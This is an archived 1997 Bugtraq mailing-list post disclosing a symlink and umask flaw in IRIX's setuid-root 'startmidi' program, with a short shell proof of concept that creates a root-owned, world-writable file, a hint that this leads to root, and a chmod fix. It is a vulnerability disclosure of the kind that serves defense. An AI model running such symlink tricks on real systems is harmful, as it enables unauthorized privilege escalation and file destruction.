[4021] in bugtraq
IRIX: Bug in startmidi
daemon@ATHENA.MIT.EDU (David Hedley)
Sun Feb 9 14:20:37 1997
Date: Sun, 9 Feb 1997 18:11:45 +0000
Reply-To: David Hedley <hedley@CS.BRIS.AC.UK>
From: David Hedley <hedley@CS.BRIS.AC.UK>
To: BUGTRAQ@NETSPACE.ORG
Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I
noticed a little suid-root program called 'startmidi' which hides in
/usr/sbin. When run, this program creates various files in /tmp. You
guessed it, it respects umask and follows symlinks. Comme ca:
% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1
%
Any existing files are trucated to zero length. New files are created
root-owned, mode 0666. I leave it to your furtive imaginations to get
root from this. 'stopmidi' removes the files created by 'startmidi' so
you may have to run that first if /tmp/.midipid already exists.
chmod -s /usr/sbin/startmidi fixes this problem.
My apologies if this has been documented before but I couldn't find it
anywhere on file and I don't remember it being posted to this list.
Regards,
David
--
David Hedley (hedley@cs.bris.ac.uk)
finger hedley@cs.bris.ac.uk for PGP key
Computer Graphics Group | University of Bristol | UK
